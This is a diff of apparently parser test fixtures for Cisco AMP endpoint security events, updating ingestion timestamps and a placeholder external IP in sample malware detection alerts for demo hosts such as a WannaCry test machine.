@@ -1399,8 +1399,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:43.965524780Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419187549993959000,\"timestamp\":1610625537,\"timestamp_nanoseconds\":208000000,\"date\":\"2021-01-14T11:58:57+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419187549993959449\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "ingested": "2021-12-09T13:35:55.388950400Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419187549993959000,\"timestamp\":1610625537,\"timestamp_nanoseconds\":208000000,\"date\":\"2021-01-14T11:58:57+00:00\",\"event_type\":\"Quarantine 
Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419187549993959449\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260880", "kind": "alert", "action": "Quarantine Failure", @@ -1420,7 +1420,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -1479,7 +1479,7 @@ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -1496,8 +1496,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:43.965526875Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419187549993959000,\"timestamp\":1610625537,\"timestamp_nanoseconds\":193000000,\"date\":\"2021-01-14T11:58:57+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419187549993959449\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\WINDOWS\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"},\"parent\":{\"process_id\":2980,\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"}}}}}", + "ingested": "2021-12-09T13:35:55.388956100Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419187549993959000,\"timestamp\":1610625537,\"timestamp_nanoseconds\":193000000,\"date\":\"2021-01-14T11:58:57+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419187549993959449\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\WINDOWS\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"},\"parent\":{\"process_id\":2980,\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"}}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -1519,7 +1519,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "parent": { 
@@ -1582,7 +1582,7 @@ "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -1599,8 +1599,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:43.965528958Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419187537109058000,\"timestamp\":1610625534,\"timestamp_nanoseconds\":853000000,\"date\":\"2021-01-14T11:58:54+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419187537109057560\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"},\"parent\":{\"process_id\":2980,\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"}}}}}", + "ingested": "2021-12-09T13:35:55.388960200Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419187537109058000,\"timestamp\":1610625534,\"timestamp_nanoseconds\":853000000,\"date\":\"2021-01-14T11:58:54+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419187537109057560\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"},\"parent\":{\"process_id\":2980,\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"}}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", 
@@ -1622,7 +1622,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "parent": { @@ -1667,7 +1667,7 @@ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -1677,8 +1677,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:43.965531032Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419187537109058000,\"timestamp\":1610625534,\"timestamp_nanoseconds\":884000000,\"date\":\"2021-01-14T11:58:54+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419187537109057560\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "ingested": "2021-12-09T13:35:55.388964700Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419187537109058000,\"timestamp\":1610625534,\"timestamp_nanoseconds\":884000000,\"date\":\"2021-01-14T11:58:54+00:00\",\"event_type\":\"Threat 
Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419187537109057560\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "553648143", "kind": "alert", "action": "Threat Quarantined", @@ -1698,7 +1698,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -1731,7 +1731,7 @@ "Demo_AMP_MAP_FriedEx" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -1741,8 +1741,8 @@ }, "event": { "severity": 0, - "ingested": "2021-09-30T00:15:43.965533117Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6583853374897127000,\"timestamp\":1610624948,\"timestamp_nanoseconds\":562000000,\"date\":\"2021-01-14T11:49:08+00:00\",\"event_type\":\"Policy Update\",\"event_type_id\":553648130,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_MAP_FriedEx\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"04:e6:4d:d5:7a:b5\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}}}}", + "ingested": "2021-12-09T13:35:55.388969800Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6583853374897127000,\"timestamp\":1610624948,\"timestamp_nanoseconds\":562000000,\"date\":\"2021-01-14T11:49:08+00:00\",\"event_type\":\"Policy 
Update\",\"event_type_id\":553648130,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_MAP_FriedEx\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"04:e6:4d:d5:7a:b5\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}}}}", "code": "553648130", "kind": "alert", "action": "Policy Update", @@ -1759,7 +1759,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "connector_guid": "test_connector_guid", "related": { @@ -1800,7 +1800,7 @@ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -1810,8 +1810,8 @@ }, "event": { "severity": 3, - "ingested": "2021-09-30T00:15:43.965535211Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":14945825043963,\"timestamp\":1610624472,\"timestamp_nanoseconds\":496121997,\"date\":\"2021-01-14T11:41:12+00:00\",\"event_type\":\"Executed malware\",\"event_type_id\":1107296272,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"start_timestamp\":1610624472,\"start_date\":\"2021-01-14T11:41:12+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"},\"parent\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}}", + "ingested": "2021-12-09T13:35:55.388974600Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":14945825043963,\"timestamp\":1610624472,\"timestamp_nanoseconds\":496121997,\"date\":\"2021-01-14T11:41:12+00:00\",\"event_type\":\"Executed malware\",\"event_type_id\":1107296272,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"start_timestamp\":1610624472,\"start_date\":\"2021-01-14T11:41:12+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"},\"parent\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}}", "code": "1107296272", "kind": "alert", "start": "2021-01-14T11:41:12.000Z", @@ -1833,7 +1833,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "parent": { @@ -1882,7 +1882,7 @@ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -1892,8 +1892,8 @@ }, "event": { "severity": 3, - "ingested": "2021-09-30T00:15:43.965537386Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":14945825043964,\"timestamp\":1610624472,\"timestamp_nanoseconds\":498576872,\"date\":\"2021-01-14T11:41:12+00:00\",\"event_type\":\"Multiple Infected Files\",\"event_type_id\":1107296258,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"start_timestamp\":1610624472,\"start_date\":\"2021-01-14T11:41:12+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"},\"parent\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}}", + "ingested": "2021-12-09T13:35:55.388994900Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":14945825043964,\"timestamp\":1610624472,\"timestamp_nanoseconds\":498576872,\"date\":\"2021-01-14T11:41:12+00:00\",\"event_type\":\"Multiple Infected Files\",\"event_type_id\":1107296258,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"start_timestamp\":1610624472,\"start_date\":\"2021-01-14T11:41:12+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"},\"parent\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}}", "code": "1107296258", "kind": "alert", "start": "2021-01-14T11:41:12.000Z", @@ -1915,7 +1915,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "parent": { @@ -1959,7 +1959,7 @@ "fce5b6784dc9f44cdc1d6214bb7b68d3029db049dcaf734edc9660bb3373bc79" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -1969,8 +1969,8 @@ }, "event": { "severity": 3, - "ingested": "2021-09-30T00:15:43.965539415Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6533671599780921000,\"timestamp\":1610623726,\"timestamp_nanoseconds\":440000000,\"date\":\"2021-01-14T11:28:46+00:00\",\"event_type\":\"Retrospective Quarantine\",\"event_type_id\":553648155,\"detection_id\":\"6533671595485954049\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Exploit_Prevention_Audit\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"d2:78:15:4a:f4:a2\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"fce5b6784dc9f44cdc1d6214bb7b68d3029db049dcaf734edc9660bb3373bc79\"}}}}", + "ingested": "2021-12-09T13:35:55.388998300Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6533671599780921000,\"timestamp\":1610623726,\"timestamp_nanoseconds\":440000000,\"date\":\"2021-01-14T11:28:46+00:00\",\"event_type\":\"Retrospective 
Quarantine\",\"event_type_id\":553648155,\"detection_id\":\"6533671595485954049\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Exploit_Prevention_Audit\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"d2:78:15:4a:f4:a2\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"fce5b6784dc9f44cdc1d6214bb7b68d3029db049dcaf734edc9660bb3373bc79\"}}}}", "code": "553648155", "kind": "alert", "action": "Retrospective Quarantine", @@ -1990,7 +1990,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -2037,7 +2037,7 @@ "bdb11107a33eaeded6a838eb2a0e6167637dbe9c" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
